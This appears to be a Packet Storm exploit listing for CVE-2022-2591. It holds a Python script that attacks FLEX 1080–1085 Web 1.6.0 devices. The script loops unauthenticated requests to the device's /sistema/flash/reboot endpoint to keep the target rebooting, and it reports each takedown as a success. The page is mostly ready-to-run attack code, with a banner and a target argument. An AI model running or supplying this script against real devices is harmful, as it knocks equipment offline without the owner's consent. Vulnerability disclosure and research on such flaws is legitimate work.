FLEX versions prior to 1085 Web 1.6.0 suffer from a denial of service vulnerability.
ae0a20928dfa334d84c3e4bae14365283943129dafd6b66b0cb30a235a9f223c# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591
#!/usr/bin/env python3
import requests
import re
import argparse
from colorama import Fore
import time
def main():
def banner():
print('''
________ _______ __
/ ____/ / / ____/ |/ /
/ /_ / / / __/ | /
/ __/ / /___/ /___ / |
/_/ /_____/_____//_/|_|
[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
''')
def reboot():
r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
if 'Rebooting' in r.text:
pass
else:
print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
não é vulnerável')
quit()
banner()
print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
while True:
try:
reboot()
print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
derrubado com sucesso!')
time.sleep(1)
except:
# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
está inativo')
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target', action='store', help='Target',
dest='target', required=True)
arguments = parser.parse_args()
try:
main()
except KeyError:
quit()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed